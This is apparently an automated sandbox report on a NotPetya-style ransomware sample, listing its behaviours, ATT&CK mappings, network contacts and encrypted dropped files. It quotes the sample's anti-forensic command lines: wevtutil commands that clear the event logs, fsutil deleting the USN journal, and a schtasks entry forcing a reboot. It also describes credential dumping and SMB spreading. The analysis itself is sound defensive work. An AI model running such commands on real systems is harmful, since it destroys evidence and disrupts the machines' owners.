            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_1-7341
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 6648Thread sleep time: -1200000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 5408Thread sleep time: -2700000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 5408Thread sleep time: -900000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\F2CD.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_4-3589
            Source: C:\Users\user\Desktop\p2pWin.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-2673
            Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 1200000Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 2700000Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 900000Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-6006
            Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\dllhost.datJump to dropped file
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: memset,memset,GetAdaptersInfo,GetAdaptersInfo,LocalAlloc,GetAdaptersInfo,inet_addr,inet_addr,inet_addr,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,htonl,LocalAlloc,inet_addr,htonl,htonl,CreateThread,CloseHandle,LocalFree,1_2_02E58E7F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,NetServerGetInfo,NetApiBufferFree,1_2_02E58243
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,GetComputerNameExW,DhcpEnumSubnets,DhcpGetSubnetInfo,DhcpEnumSubnetClients,htonl,htonl,htonl,inet_ntoa,GetProcessHeap,HeapFree,DhcpRpcFreeMemory,DhcpRpcFreeMemory,1_2_02E5908A
            Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 1200000Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 2700000Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 900000Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_1-5828
            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_1-5889
            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_1-5761
            Source: C:\Users\user\AppData\Local\Temp\F2CD.tmpAPI call chain: ExitProcess graph end nodegraph_4-3591
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
            Source: rundll32.exe, 00000001.00000002.1670751144.0000000004D61000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: rundll32.exe, 00000001.00000002.1670751144.0000000004D61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWrB
            Source: C:\Users\user\AppData\Local\Temp\F2CD.tmpProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E51973 PathCombineW,FindFirstFileW,StrStrIW,WaitForSingleObject,PathCombineW,StrStrIW,PathFindExtensionW,wsprintfW,StrStrIW,FindNextFileW,FindClose,1_2_02E51973
            Source: C:\Users\user\Desktop\p2pWin.exeCode function: 0_2_0003318B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0003318B
            Source: C:\Users\user\Desktop\p2pWin.exeCode function: 0_2_00032C3B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00032C3B
            Source: C:\Users\user\Desktop\p2pWin.exeCode function: 0_2_00031000 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,ExpandEnvironmentStringsA,GetProcessHeap,HeapAlloc,GetFullPathNameA,GetProcessHeap,HeapFree,0_2_00031000
            Source: C:\Users\user\AppData\Local\Temp\F2CD.tmpProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E5A2E8 htonl,memset,socket,htons,ioctlsocket,LdrInitializeThunk,connect,select,__WSAFDIsSet,closesocket,1_2_02E5A2E8
            Source: C:\Users\user\Desktop\p2pWin.exeCode function: 0_2_00032C3B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00032C3B
            Source: C:\Users\user\Desktop\p2pWin.exeCode function: 0_2_000310E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_000310E6
            Source: C:\Users\user\AppData\Local\Temp\F2CD.tmpCode function: 4_2_00007FF72E9055B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF72E9055B8
            Source: C:\Users\user\AppData\Local\Temp\F2CD.tmpCode function: 4_2_00007FF72E905874 SetUnhandledExceptionFilter,4_2_00007FF72E905874
            Source: C:\Users\user\AppData\Local\Temp\F2CD.tmpCode function: 4_2_00007FF72E907270 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF72E907270

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 80Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 173.222.162.32 445Jump to behavior
            Source: C:\Users\user\Desktop\p2pWin.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E573FD GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,1_2_02E573FD
            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\p2pWin.exeCode function: 0_2_0003276F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0003276F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E573FD GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,1_2_02E573FD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_02E57DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx,1_2_02E57DEB

            Stealing of Sensitive Information

            barindex
            Yara detected Mimikatz
            Source: Yara matchFile source: 4.0.F2CD.tmp.7ff72e900000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.F2CD.tmp.7ff72e900000.0.unpack, type: UNPACKEDPE
            Contains functionality to dump credential hashes (LSA Dump)
            Source: C:\Users\user\AppData\Local\Temp\F2CD.tmpCode function: 4_2_00007FF72E902610 GetModuleHandleW,GetProcAddress,RtlInitUnicodeString,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,4_2_00007FF72E902610
            Source: Yara matchFile source: C:\Windows\dllhost.dat, type: DROPPED

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            1
            Valid Accounts            		2
            Windows Management Instrumentation            		1
            Valid Accounts            		1
            Valid Accounts            		1
            Obfuscated Files or Information            		1
            OS Credential Dumping            		1
            System Time Discovery            		1
            Taint Shared Content            		11
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Ingress Tool Transfer            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
            Data Encrypted for Impact            		Acquire InfrastructureGather Victim Identity Information
            Default Accounts3
            Native API            		1
            Scheduled Task/Job            		11
            Access Token Manipulation            		1
            File Deletion            		LSASS Memory3
            File and Directory Discovery            		11
            Exploitation of Remote Services            		Data from Removable MediaExfiltration Over Bluetooth22
            Encrypted Channel            		SIM Card SwapObtain Device Cloud Backups11
            System Shutdown/Reboot            		DomainsCredentials
            Domain Accounts2
            Command and Scripting Interpreter            		4
            Bootkit            		112
            Process Injection            		2
            Masquerading            		Security Account Manager4
            System Information Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
            Non-Standard Port            		Data Encrypted for ImpactDNS ServerEmail Addresses
            Local Accounts1
            Scheduled Task/Job            		Login Hook1
            Scheduled Task/Job            		1
            Valid Accounts            		NTDS1
            Network Share Discovery            		Distributed Component Object ModelInput CaptureTraffic Duplication1
            Application Layer Protocol            		Data DestructionVirtual Private ServerEmployee Names
            Cloud Accounts1
            Service Execution            		Network Logon ScriptNetwork Logon Script21
            Virtualization/Sandbox Evasion            		LSA Secrets21
            Security Software Discovery            		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
            Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Access Token Manipulation            		Cached Domain Credentials21
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
            External Remote ServicesSystemd TimersStartup ItemsStartup Items112
            Process Injection            		DCSync12
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
            Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
            Bootkit            		Proc Filesystem1
            Remote System Discovery            		Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
            Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Rundll32            		/etc/passwd and /etc/shadow1
            System Network Configuration Discovery            		Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
            Supply Chain CompromisePowerShellCronCron2
            Indicator Removal            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1346554 Sample: p2pWin.exe Startdate: 22/11/2023 Architecture: WINDOWS Score: 100 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus / Scanner detection for submitted sample 2->62 64 Multi AV Scanner detection for submitted file 2->64 66 5 other signatures 2->66 8 p2pWin.exe 2 2->8         started        process3 file4 38 C:\Windows\dllcm.dat, data 8->38 dropped 68 Contains functionality to create processes via WMI 8->68 12 rundll32.exe 3 8->12         started        signatures5 process6 dnsIp7 48 173.222.162.32, 139, 443, 445 AKAMAI-ASUS United States 12->48 50 192.168.2.0 unknown unknown 12->50 52 192.168.2.1, 274, 80 unknown unknown 12->52 40 \Device\Harddisk0\DR0, data 12->40 dropped 42 C:\Program Files\...\updater.exe, data 12->42 dropped 44 C:\Program Files\...\private_browsing.exe, data 12->44 dropped 46 34 other files (33 malicious) 12->46 dropped 70 Detected Petya / NotPetya (based on Eternalblue SMBv1 Shellcode pattern) 12->70 72 System process connects to network (likely due to code injection or exploit) 12->72 74 Contains functionality to check for running processes (XOR) 12->74 76 10 other signatures 12->76 17 cmd.exe 1 12->17         started        20 cmd.exe 1 12->20         started        22 F2CD.tmp 1 12->22         started        file8 signatures9 process10 signatures11 54 Clears the journal log 17->54 56 Uses schtasks.exe or at.exe to add and modify task schedules 17->56 24 conhost.exe 17->24         started        26 schtasks.exe 1 17->26         started        28 conhost.exe 20->28         started        30 wevtutil.exe 1 20->30         started        32 wevtutil.exe 1 20->32         started        36 3 other processes 20->36 58 Contains functionality to dump credential hashes (LSA Dump) 22->58 34 conhost.exe 22->34         started        process12

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            p2pWin.exe59%ReversingLabsWin32.Ransomware.GoldenEye
            p2pWin.exe100%AviraHEUR/AGEN.1316511
            p2pWin.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Windows\dllhost.dat2%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://192.168.2.1/0%Avira URL Cloudsafe
            http://192.168.2.1:80/0%Avira URL Cloudsafe
            http://192.168.2.1/#=0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            fp2e7a.wpc.phicdn.net
            		192.229.211.108
            		truefalse
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://192.168.2.1/#=rundll32.exe, 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://192.168.2.1:80/rundll32.exe, 00000001.00000002.1670751144.0000000004D52000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://192.168.2.1/rundll32.exe, 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              173.222.162.32
              		unknownUnited States
              		35994AKAMAI-ASUStrue

              Private

              IP
              192.168.2.0
              192.168.2.1

              General Information

              Joe Sandbox Version:38.0.0 Ammolite
              Analysis ID:1346554
              Start date and time:2023-11-22 19:11:22 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 6m 0s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:14
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:
              Sample file name:p2pWin.exe
              Detection:MAL
              Classification:mal100.rans.spre.troj.spyw.evad.winEXE@24/63@0/3
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 71
              • Number of non-executed functions: 74
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Connection to analysis system has been lost, crash info: Unknown
              • Excluded IPs from analysis (whitelisted): 72.21.81.240
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: p2pWin.exe

              Simulations

              Behavior and APIs

              TimeTypeDescription
              19:12:08API Interceptor3x Sleep call for process: rundll32.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              fp2e7a.wpc.phicdn.netAntiRecuvaAndDB.exeGet hashmaliciousPhobosBrowse
              • 192.229.211.108
              eJQX7qdYIS.exeGet hashmaliciousRedLine, zgRATBrowse
              • 192.229.211.108
              SCO24.pif.exeGet hashmaliciouszgRATBrowse
              • 192.229.211.108
              file.exeGet hashmaliciousRedLine, SectopRATBrowse
              • 192.229.211.108
              file.exeGet hashmaliciousRedLineBrowse
              • 192.229.211.108
              Anna_Maria.exeGet hashmaliciousUnknownBrowse
              • 192.229.211.108
              INVOICE.exeGet hashmaliciousRemcos, AgentTesla, AsyncRAT, Clipboard HijackerBrowse
              • 192.229.211.108
              file.exeGet hashmaliciousPhonk MinerBrowse
              • 192.229.211.108
              SWIFT.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
              • 192.229.211.108
              SOA_settlement_order_remittance_invoice_19_11_20230000000000000000000000000_2023.vbsGet hashmaliciousGuLoaderBrowse
              • 192.229.211.108
              PO-230270.exeGet hashmaliciousFormBookBrowse
              • 192.229.211.108
              SOA_settlement_details_transfer_invoice_014_november_2023.exeGet hashmaliciousAgentTeslaBrowse
              • 192.229.211.108
              NewOrder.exeGet hashmaliciousAgentTeslaBrowse
              • 192.229.211.108
              poc.exeGet hashmaliciousClipboard HijackerBrowse
              • 192.229.211.108
              https://134.122.188.176/Get hashmaliciousUnknownBrowse
              • 192.229.211.108
              txt.ps1Get hashmaliciousAgentTeslaBrowse
              • 192.229.211.108
              lnvoice-1597256897.pdf.jsGet hashmaliciousAgentTeslaBrowse
              • 192.229.211.108
              NewOrder.exeGet hashmaliciousLokibotBrowse
              • 192.229.211.108
              RO67OsrIWi.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
              • 192.229.211.108
              NewOrder.exeGet hashmaliciousLokibotBrowse
              • 192.229.211.108

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              AKAMAI-ASUShttp://fixme.itGet hashmaliciousUnknownBrowse
              • 23.212.249.134
              https://storage.googleapis.com/logon-webservices73h6439jd983rnk3fy9ohiu4h83rtb478yhf474yrfh4/preload-reCaptcha.htmlGet hashmaliciousFake Captcha, HTMLPhisherBrowse
              • 23.212.249.90
              Microsoft 365 security You have messages in quarantine.msgGet hashmaliciousFake Captcha, HTMLPhisherBrowse
              • 23.220.140.112
              http://img1.wsimg.com/blobby/go/7a01c1ee-685d-49b6-ad23-74636c936c34/downloads/10651641465.pdfGet hashmaliciousUnknownBrowse
              • 23.50.230.182
              https://storage.googleapis.com/fedexfr/hreflj.html#?Z289MSZzMT0xNzQzNzkwJnMyPTM2NjgzMjYyNyZzMz1HTEI=Get hashmaliciousPhisherBrowse
              • 104.70.70.162
              ZenY9BAc8B.elfGet hashmaliciousMiraiBrowse
              • 2.16.193.215
              VLMEMjKea7.elfGet hashmaliciousMiraiBrowse
              • 104.78.21.178
              ccbS3mSC4n.elfGet hashmaliciousMiraiBrowse
              • 72.246.93.178
              WzpinhzvZl.elfGet hashmaliciousMiraiBrowse
              • 95.101.173.139
              7vbrDg2AF5.elfGet hashmaliciousMiraiBrowse
              • 95.101.248.59
              https://www.vmware.com/go/getplayer-winGet hashmaliciousUnknownBrowse
              • 23.57.80.48
              http://steemcomunility.ru/Get hashmaliciousUnknownBrowse
              • 23.215.0.145
              https://www.enrruchi.xyz/loginGet hashmaliciousUnknownBrowse
              • 23.222.196.28
              https://www.gcvsqap.cn/loginGet hashmaliciousUnknownBrowse
              • 23.209.60.28
              https://hasvp.apinvoicesquickbookapp.top/?pgn=ptmetcm5hZ2xlQG9sZHBsYW5rdHJhaWxiYW5rLmNvbQ==Get hashmaliciousUnknownBrowse
              • 23.215.0.165
              Aging#04533.htmGet hashmaliciousHTMLPhisherBrowse
              • 23.54.202.151
              Aging#04533.htmGet hashmaliciousHTMLPhisherBrowse
              • 23.205.104.41
              https://fs6.formsite.com/res/showFormPreview?EParam=0f3EXAbWkRy3B3dNHgQl_huJ3lg3ramcMyDvWowlzTJXAg2hUkggomInZJc2I3ByGet hashmaliciousHTMLPhisherBrowse
              • 23.215.0.166
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 23.200.88.41
              https://www.thenicheng.comGet hashmaliciousUnknownBrowse
              • 23.218.144.90

              JA3 Fingerprints

              No context

              Dropped Files

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Windows\dllhost.dat027.dllGet hashmaliciousPetya / NotPetya, MimikatzBrowse
                QYXZGHJc38.dllGet hashmaliciousPetya / NotPetya, MimikatzBrowse
                  NotPetya.exeGet hashmaliciousMimikatz, NotPetyaBrowse
                    NotPetya DLL.dll.dllGet hashmaliciousPetya / NotPetya, MimikatzBrowse
                      Trojan.Ransom.exeGet hashmaliciousMimikatz, NotPetyaBrowse
                        qFTst626iV.dllGet hashmaliciousPetya / NotPetya, MimikatzBrowse
                          NotPetya.dllGet hashmaliciousPetya / NotPetya, MimikatzBrowse
                            notpetya.dllGet hashmaliciousPetya / NotPetya MimikatzBrowse
                              6r3kQ7Ddkk.dllGet hashmaliciousPetya / NotPetya MimikatzBrowse
                                Xu0Yl0gJER.dllGet hashmaliciousPetya / NotPetya MimikatzBrowse
                                  5qoV7TRt2Y.dllGet hashmaliciousPetya / NotPetya MimikatzBrowse
                                    tvHP8AUd45.dllGet hashmaliciousNotPetyaBrowse
                                      PbrBnW71uv.dllGet hashmaliciousPetya / NotPetyaBrowse
                                        rTcWdtStAN.dllGet hashmaliciousUnknownBrowse
                                          NotPetya.dllGet hashmaliciousBrowse
                                            02XuXOatFM.dllGet hashmaliciousBrowse

                                              Created / dropped Files

                                              C:

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.13872951814887827
                                              Encrypted:false
                                              SSDEEP:3:Ht:N
                                              MD5:0DB8708BF10FF08A0995C18CBE0C5D32
                                              SHA1:E3C6D04B750A6DEE95826F8C320B8097D610D7CC
                                              SHA-256:54F4B58FBB22D05FAFB4B3353DF1832E24041934776683098DD7D4657FD48590
                                              SHA-512:737F103C6D609144F4E750B8C6FBBF006C3D059C93F0C678DC397FE404633B6BF96CC82A23A980D34CF468AF3068FEA16C483E5CAD6051603C75502997D45FFC
                                              Malicious:true
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Program Files\7-Zip\7z.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):557072
                                              Entropy (8bit):7.999682221727512
                                              Encrypted:true
                                              SSDEEP:12288:DXfWIA/uXbB5UhW/k/mtAUnBOcaQRKx3KLy4Mjl7dj7tGlkZemM:DXBshQPOcXYx6Yjl7djJGmZej
                                              MD5:DB542E0D64E36EB335E341D901390518
                                              SHA1:3CCBFCB69E83DE26F42F875797095CF745844939
                                              SHA-256:D55F29A73279BB11C25EFEBF85355085AA994034FE85683C768B4FED6EB2A914
                                              SHA-512:D8319B49F9E8C06E50A94D6D1791A5B78F212607C3CFBB279FE868C684AE87FB39CD14E8AC67B0BC48F2A8A9B3223EA5AFB7907F860C23997B3E1F38573F284A
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$........X.../....S}s..l..}..j.B..j.Z.+...<X.$..X(w..`x.s3.....*.......>.5..F.....g.T7.....K...bA.}P..z..I...%E..s..O........9 ...3.A..s-.....en.;_.1..M*...{..Ua&...O...$2V....>z.s.z8<P.Xi!....Q./. .....b.&.......RD...Q7...0f..|.Z....+......b/..z....&".1Ki.$&c./....k..rK...l#+.LT3.d...:.\7..|...X|.......:W.`z*......}F......_{.X.5.C.....1...y...c<+fp.......PK2.7#M.+...c...[o........].Q|FQ.]....3p..Rl8\?..u.HM..........O...<.Uj.....5...`bO.....\....*..d....&7.:&z8..2zC!^z..oU8.~X..im.%o.....0....ER.C...X.S.6.I\......o^~......X..Y..@r*.Er3..1.m..).].......E.wv.\..._...CZW.....g..$<E..S....._.,?.C.i...Yg...@7..;].DE.I....5.av...\.......Y.....n.....+c.H....V.k1hj=l...=V..m...&enR.o..<.gM...nG..r..&....-....\R../...hB..."=....n.l...D.....9UN../..]..;]'.. .>.h...s|In....y}.=.......V..x..9...*..m?.L..^.Q].............u]@Y[0.g...t`..N..q..|._..../X.A]t...=.*k...Nu...25.J.....y...%IS..v..u.pR..YO.u=u

                                              C:\Program Files\7-Zip\7zFM.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):952848
                                              Entropy (8bit):7.999825982386416
                                              Encrypted:true
                                              SSDEEP:24576:kac25YsdXdFJolx98w6boA0AH8pVoh34oCzF2IUAu:3c25Ysd32fqw6bfH8pGh3wzF2IU7
                                              MD5:34E1D2A3E9DB60BA862618B413CEB65A
                                              SHA1:AA29FB32E7BA83E3683EB46DBB9ED37D36599B50
